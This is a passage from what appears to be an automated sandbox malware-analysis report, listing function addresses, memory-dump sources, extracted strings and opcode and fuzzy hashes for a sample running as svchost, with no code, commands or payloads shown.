                                                                                                              Function 03B3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                              • Instruction ID: 47091192812c630d5ed9d2317351299869035e13bcf7dd3b113820555dd7f8c9
                                                                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                              • Instruction Fuzzy Hash: 07615E75D00229EBDF21DF99C840BAEFBB8FF85758F1445BAE821AB290D7749901CB50
                                                                                                              Function 03B2B2D3 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 04_w04_wI_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-4217632228
                                                                                                              • Opcode ID: 8a12c5daf0c57783511e012e195ec5a1faab029f181d24c4a7be18f59b170428
                                                                                                              • Instruction ID: 8f52522da884f84151fabf3a8cc690fd9e3b3d7df3c08aab8d4ba1e7131acc44
                                                                                                              • Opcode Fuzzy Hash: 8a12c5daf0c57783511e012e195ec5a1faab029f181d24c4a7be18f59b170428
                                                                                                              • Instruction Fuzzy Hash: 8A410375600710AFCB26EF29D880B26BFA9EF44728F1945FAE559DF251DB70DC008B90
                                                                                                              Function 03BBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                              • Instruction ID: b54c82c18204d8318ae81c0d6e8e5a44b01b8a0c9b843e6e7789992f3ee15d3f
                                                                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                              • Instruction Fuzzy Hash: 87517772604705AFD721DE54CC40FBAB7F8FB84758F0809B9B9949B290DBB0E914CB96
                                                                                                              Function 03B4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: 923bedfb5282ede3d6ae2f3e740db184a261fc313a987e3ee6cbf0b5d673c7c1
                                                                                                              • Instruction ID: 98528b3108daaeeb035203780e1b25476bb6e281ce958895940c5bb7d6043466
                                                                                                              • Opcode Fuzzy Hash: 923bedfb5282ede3d6ae2f3e740db184a261fc313a987e3ee6cbf0b5d673c7c1
                                                                                                              • Instruction Fuzzy Hash: D0417E76508311ABD720DA648980B6BB7E8FF8871CF0409BAF584EB180EA74D904D79A
                                                                                                              Function 03BEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PreferredUILanguages
                                                                                                              • API String ID: 0-1884656846
                                                                                                              • Opcode ID: c2c9035fad7ccf6199d41379dace59b2057d3565583dcd80d9c413df0cfc884d
                                                                                                              • Instruction ID: 4f1e37353cd7258121da84bcaeb6b701ca11aed9e8ceebddbe90d69f9373d09b
                                                                                                              • Opcode Fuzzy Hash: c2c9035fad7ccf6199d41379dace59b2057d3565583dcd80d9c413df0cfc884d
                                                                                                              • Instruction Fuzzy Hash: 8C41A336D04219ABCF21DA98C841BEEF7B9EF44758F0501BAE951AB254D7B0DF40C7A0
                                                                                                              Function 03BAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: d561bca47a72b37b29701d925e3718abfc771aaf497e28efc17c8f8dbbd932d6
                                                                                                              • Instruction ID: 61f0fb6dc42a3ea649cc4ec905735041b1bf62437f732db551b38201f1a3fa13
                                                                                                              • Opcode Fuzzy Hash: d561bca47a72b37b29701d925e3718abfc771aaf497e28efc17c8f8dbbd932d6
                                                                                                              • Instruction Fuzzy Hash: F14131B5D04A2CAADF21DA54DC84FEEB77CEB44718F0045F5E618EB140DB709E898BA4
                                                                                                              Function 03BB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: verifier.dll
                                                                                                              • API String ID: 0-3265496382
                                                                                                              • Opcode ID: 7ab0d1e57bf46bbdd4e26616d5880f17f49c677b4dc350f03e382fc8dcc1bc7b
                                                                                                              • Instruction ID: b3e0abb7da05c3992c711531652122aed5607ab11abc821fd46dda7045cc4bbd
                                                                                                              • Opcode Fuzzy Hash: 7ab0d1e57bf46bbdd4e26616d5880f17f49c677b4dc350f03e382fc8dcc1bc7b
                                                                                                              • Instruction Fuzzy Hash: 333193B57103019FDB24DF699C50B76B7F5EB49758F5880BAE648DF280EBB18C8087A0
                                                                                                              Function 03B636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Flst
                                                                                                              • API String ID: 0-2374792617
                                                                                                              • Opcode ID: f0412677838b285312839d779771da12dc53e3529fa609b942da6b87666a7353
                                                                                                              • Instruction ID: eab71d706633dc93b62798b142b5523de6fa426bc756a8228cb1bfbdb6381f07
                                                                                                              • Opcode Fuzzy Hash: f0412677838b285312839d779771da12dc53e3529fa609b942da6b87666a7353
                                                                                                              • Instruction Fuzzy Hash: 0C4198B56057019FC314CF28C080A26FBE4EB89718F5885BEE55ACF292DB31D942CB92
                                                                                                              Function 03B29730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: L4_wL4_w
                                                                                                              • API String ID: 0-4042522810
                                                                                                              • Opcode ID: d532fd346c154d42969c024c9967ac2e2a11216a633a784b8e44fde9d76125ac
                                                                                                              • Instruction ID: 0213e0f06743e466326060bd997b5957ebda8edaa28c8af99cd0b115ac57effb
                                                                                                              • Opcode Fuzzy Hash: d532fd346c154d42969c024c9967ac2e2a11216a633a784b8e44fde9d76125ac
                                                                                                              • Instruction Fuzzy Hash: F421A17AA00B24AFC722EF588400B1ABFB5FB84B58F1505B9A95DDF251D770EC11CBA0
                                                                                                              Function 004045C4 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Nj:
                                                                                                              • API String ID: 0-3166132045
                                                                                                              • Opcode ID: fa7d4e3967f31540b878af8fb6f3969df631bce06a6ad072bf65da0a19305ee9
                                                                                                              • Instruction ID: 8cf2aa35ef8233358c7a4addb548fa1e3476db04209d2e11cb3d153df63f68af
                                                                                                              • Opcode Fuzzy Hash: fa7d4e3967f31540b878af8fb6f3969df631bce06a6ad072bf65da0a19305ee9
                                                                                                              • Instruction Fuzzy Hash: 092148B1D0121D9FCF84DFB889466EEBFB4FB09300F20466AD919E6251E33946418FA5
                                                                                                              Function 03B35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Actx
                                                                                                              • API String ID: 0-89312691
                                                                                                              • Opcode ID: ed6c8cad40a298d4ecd94b7ad3b4bb7def8eee9dea7f0248d03a9dd1cf21b5e3
                                                                                                              • Instruction ID: e0645b043ff01c21541adff73ab85daeda273235daab42a8a1372285fdc6bc0f
                                                                                                              • Opcode Fuzzy Hash: ed6c8cad40a298d4ecd94b7ad3b4bb7def8eee9dea7f0248d03a9dd1cf21b5e3
                                                                                                              • Instruction Fuzzy Hash: 8F1166717059228BEB34C91D88506B6F6D5EB9726CF3C45FBD451CB391D673D8418780
                                                                                                              Function 03BB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrCreateEnclave
                                                                                                              • API String ID: 0-3262589265
                                                                                                              • Opcode ID: 0a4d36a1e93d8edd703151ffe6009f7c4ad2c209afaa062105f03874f23590cb
                                                                                                              • Instruction ID: a0914ebe7c272024c38e160c52fbb36338f4c6aa2d2332c41a59b63fa2b253a2
                                                                                                              • Opcode Fuzzy Hash: 0a4d36a1e93d8edd703151ffe6009f7c4ad2c209afaa062105f03874f23590cb
                                                                                                              • Instruction Fuzzy Hash: F22118B5518344AFC310DF2AD844A9BFBF8FBD5B04F104A6EF5A497250DBB09905CB92
                                                                                                              Function 03B6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 231e3fd3284ce53e8fa5dca8088c92ab7603930c73f458e2a7329bf70153d7b7
                                                                                                              • Instruction ID: 00d92e9dcac916fdb689c1548411a4bed93e4052ca64bdf6eb9feeb9d02572d8
                                                                                                              • Opcode Fuzzy Hash: 231e3fd3284ce53e8fa5dca8088c92ab7603930c73f458e2a7329bf70153d7b7
                                                                                                              • Instruction Fuzzy Hash: 6B822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                                                              Function 03B7516C Relevance: .8, Instructions: 785COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 890b90fd7d7887c19fa1ace971cb39f3d615b9a99f84665abf6bc423b830c61b
                                                                                                              • Instruction ID: 2c74a7996079962e76b8d39586cc07eb267aa40762fee930ef098cc3e076f028
                                                                                                              • Opcode Fuzzy Hash: 890b90fd7d7887c19fa1ace971cb39f3d615b9a99f84665abf6bc423b830c61b
                                                                                                              • Instruction Fuzzy Hash: B9627532D0864AAFCF35CF14D4905AEFB62FA56318B49C5EEC8AA27704D371B944CB91
                                                                                                              Function 03B8739A Relevance: .7, Instructions: 705COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b79df84f28f7faca8ac8acffe3310b3946804ca1e3afb47255766897d89d34c
                                                                                                              • Instruction ID: a5c76ea4a604f9116b5e9baa5e0bb1f28c5ac838cf97a1499328ef7fad531bbb
                                                                                                              • Opcode Fuzzy Hash: 1b79df84f28f7faca8ac8acffe3310b3946804ca1e3afb47255766897d89d34c
                                                                                                              • Instruction Fuzzy Hash: 9742B075A006169FDB14DF59C491AAEF7B6FF8831CB2885BDD456AB340DB30E842CB90
                                                                                                              Function 03B85AA0 Relevance: .7, Instructions: 652COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                              • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                              • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                              • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                              Function 03B5B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e3140dcc6271d3e7d36494417eb805c46fdb7adde3fb2f3e8cd4ac978326eaf
                                                                                                              • Instruction ID: cd5045668b765a6c2ba370deeb63efb712aa4f6eeabc4e7348c6adf2df681fd8
                                                                                                              • Opcode Fuzzy Hash: 4e3140dcc6271d3e7d36494417eb805c46fdb7adde3fb2f3e8cd4ac978326eaf
                                                                                                              • Instruction Fuzzy Hash: 5E329F75E01219DBCF24DF68C890BAEBBB5FF94718F1800B9E805AB391E7759911CB90
                                                                                                              Function 03B42840 Relevance: .6, Instructions: 605COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f474ca54fb5cc5d3b35123763c1f94022697d8c52efb3541d7ed568c26c26851
                                                                                                              • Instruction ID: bdf6d5957622fae8406a45ec7358595ed2e21e5a9f6b2631faaf9b70d6850094
                                                                                                              • Opcode Fuzzy Hash: f474ca54fb5cc5d3b35123763c1f94022697d8c52efb3541d7ed568c26c26851
                                                                                                              • Instruction Fuzzy Hash: 3932AD74A007558BEF24CF69C8447BEFBF6EF84318F1845BAE4869B284D735A841DB50
                                                                                                              Function 03BDA118 Relevance: .6, Instructions: 591COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47c73e642415bd58de28c03145bf9db73afcab34dcdfbfab9d62ff07677d072c
                                                                                                              • Instruction ID: 1970847b8664939ed43b7af2997dc8734b7d01ca83c534dd30d798c0c9490ebe
                                                                                                              • Opcode Fuzzy Hash: 47c73e642415bd58de28c03145bf9db73afcab34dcdfbfab9d62ff07677d072c
                                                                                                              • Instruction Fuzzy Hash: AB22AC746046518BDB24CF29C094772BBF1EF45308F0888EAE8968F686F735E592DB61
                                                                                                              Function 03BF16CC Relevance: .6, Instructions: 571COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2974cfcbbd9ec2216f5ec328549f32e45653c15892e44f386ab39e2807702ec1
                                                                                                              • Instruction ID: f5b676187841c564bbeb47c865d5fa2fdb0feed8ff1d01a8fe6f2cb29f55c124
                                                                                                              • Opcode Fuzzy Hash: 2974cfcbbd9ec2216f5ec328549f32e45653c15892e44f386ab39e2807702ec1
                                                                                                              • Instruction Fuzzy Hash: A822B135A00216CFCB19CF5DC480AAAF7B6FF88318F1899BDD6559B345DB30A946CB90
                                                                                                              Function 03BF1D5A Relevance: .6, Instructions: 559COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92334a61e615f0b75c2bb61600e2a0b8f9b3647e80c15e1beff5a9c6f6774973
                                                                                                              • Instruction ID: 4449e2bd13950fad68951916df858947e438cf9451dbbd351c40b322740e6cfe
                                                                                                              • Opcode Fuzzy Hash: 92334a61e615f0b75c2bb61600e2a0b8f9b3647e80c15e1beff5a9c6f6774973
                                                                                                              • Instruction Fuzzy Hash: 78226F396047128FD718CF28C490A2AF3E5FF89318B185ABDE696CB351D730E949CB91
                                                                                                              Function 03B58DBF Relevance: .6, Instructions: 554COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60d7f41c770db53f59a463d962165948448de1c287fd6d079465d5e659314709
                                                                                                              • Instruction ID: 2af1547992af0d13c869e5c9d858279ef51a4fd54e3a17fe8099c48f59e6b695
                                                                                                              • Opcode Fuzzy Hash: 60d7f41c770db53f59a463d962165948448de1c287fd6d079465d5e659314709
                                                                                                              • Instruction Fuzzy Hash: 8C220A70E0421ADBDF15CF65C480ABEFBB6EB88308B5884BAE855DB251E734D941CB64
                                                                                                              Function 03BF2446 Relevance: .5, Instructions: 485COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab37f970a343ca9b5a13eab90bc46c5620ca8e626d6a1a0ec7f244a67e1fb5f2
                                                                                                              • Instruction ID: 1bc564b407f6a0e5a35e53ba0cc405a81743a21b7d953ea9b0334123e030f4f0
                                                                                                              • Opcode Fuzzy Hash: ab37f970a343ca9b5a13eab90bc46c5620ca8e626d6a1a0ec7f244a67e1fb5f2
                                                                                                              • Instruction Fuzzy Hash: 4202C0386046518FDB24CF2AC450275FBF1EF85308B5899FADA96CF281D734E85ADB60
                                                                                                              Function 03C0B16B Relevance: .4, Instructions: 450COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd686dca893ea7c41ba2a3eca1f04649e43a1d44889e65ce570e5ec801286f38
                                                                                                              • Instruction ID: 619028c3bea2bcddcd0c3f8c455f7a10422f567e59f775d3c2c45db7cf5696ee
                                                                                                              • Opcode Fuzzy Hash: cd686dca893ea7c41ba2a3eca1f04649e43a1d44889e65ce570e5ec801286f38
                                                                                                              • Instruction Fuzzy Hash: 93F1D572E006559BCB18DFA9C99067EFBF5AF8831071941A9D456DF3C0E634EE41CB90
                                                                                                              Function 0040FED3 Relevance: .4, Instructions: 435COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                              • Instruction ID: fcacbb8c9441478024ed503d3e5299d162d2d0b2d1204655e5d1e7211600a9e8
                                                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                              • Instruction Fuzzy Hash: 16026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                              Function 03C0A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b6cc83ff8d5a32afcd4a1e44ff548c128d5b8c3bff23c2ef7cdb80acc8a6abc
                                                                                                              • Instruction ID: 35cb04373d3c375ac7f6437f82cc99cdbe7e7a32bf91ec5c5b29f77fae459364
                                                                                                              • Opcode Fuzzy Hash: 2b6cc83ff8d5a32afcd4a1e44ff548c128d5b8c3bff23c2ef7cdb80acc8a6abc
                                                                                                              • Instruction Fuzzy Hash: CEF1C477E006669BCB18CE69C5A05BDFBF5AF45200B1A4269D866EF3C0D734EE41CB90
                                                                                                              Function 03B28397 Relevance: .4, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e72e518ade0ce8847957a2c93b4a83507bb9a1e4ec4cad82cca4f998a42038ee
                                                                                                              • Instruction ID: c7e8924634d46669ef805ad5d2b957c388e4020cc14a11c2e93814ebe79c0ea9
                                                                                                              • Opcode Fuzzy Hash: e72e518ade0ce8847957a2c93b4a83507bb9a1e4ec4cad82cca4f998a42038ee
                                                                                                              • Instruction Fuzzy Hash: F9D1A475A007269BCF14DF64C890ABABBA5FF4431CF0846B9E919DF290EB34D945CB50
                                                                                                              Function 03B5C6E0 Relevance: .4, Instructions: 367COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 440a1923684b299584ae2e95760e84cecce906d152e8b235b30f2a4b60092a8b
                                                                                                              • Instruction ID: 3bf260fc534da90ae7b05ae30f34bc6061fe187d42e42b8f62e1305feafd8cf3
                                                                                                              • Opcode Fuzzy Hash: 440a1923684b299584ae2e95760e84cecce906d152e8b235b30f2a4b60092a8b
                                                                                                              • Instruction Fuzzy Hash: 97D15D71E043198BEF29CE98C5853BDBFB6FB44308F1880BAEC46AB695D7748941CB45
                                                                                                              Function 03B438E0 Relevance: .3, Instructions: 349COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f343d1e6f29fd43d9ab198f02cf750623aa83fe795f0d35c6af99abde22492fa
                                                                                                              • Instruction ID: 9efc3205a6e38669817a3fb5f0902d4cb6c9f6d6c05ca623adbda37d94e7a486
